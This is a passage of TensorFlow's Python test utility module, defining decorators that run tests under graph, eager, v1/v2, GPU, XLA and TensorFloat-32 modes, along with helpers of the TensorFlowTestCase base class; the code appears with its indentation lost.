combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
be used with complex64
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
# is_mlir_bridge_enabled() returns None, the user did not explictly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
